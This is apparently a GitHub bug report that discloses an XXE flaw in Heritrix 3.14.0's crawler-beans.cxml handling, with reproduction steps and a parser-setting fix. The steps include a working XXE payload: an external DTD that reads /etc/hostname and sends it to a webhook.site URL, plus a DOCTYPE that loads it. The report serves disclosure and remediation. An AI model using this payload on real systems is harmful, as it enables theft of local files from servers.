-
Notifications
You must be signed in to change notification settings - Fork 778
Description
I'll preface this by saying, yes, I've read the security.md, and this seems to fall under the elephant in the room but I thought it was still worth a bug report.
XXE to LFI in Heritrix-3.14.0:
Impact:
While the severity of this vulnerability is high, it's of low impact since only authorized heritrix users should have the permissions to modify crawler-beans.cxml. Currently, I believe this vulnerability can only be exploited with write access to the file.
Verification:
- Download the latest version of Heritrix. Set it up as specified here.
- go to https://webhook.site to get a temporary site
- click 'edit' and paste the following in the content field:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "
<!ENTITY % exfil SYSTEM 'https://webhook.site/<YOUR UUID>/?d=%file;'>">
%eval;
%exfil;
set content type to application/octet-stream
3. add the following somewhere in the crawler conf (crawler-beans.cxml):
<!DOCTYPE beans [
<!ENTITY % xxe SYSTEM "https://webhook.site/<YOUR UUID>">
%xxe;
]>
- Whenever the job is built (or really whenever the XML is handled in any way) the external entity will exfiltrate the file specified in the dtd.
Remediation:
To mitigate this vulnerability, disable DOCTYPE declarations by setting the XML parser feature http://apache.org/xml/features/disallow-doctype-decl to true in CrawlJob.java. This prevents both XXE attacks and related XML-based DoS vectors (e.g., Billion Laughs).
Before implementing, verify that no legitimate functionality depends on external entity resolution. It didn't seem to be the case here, but it's something to consider.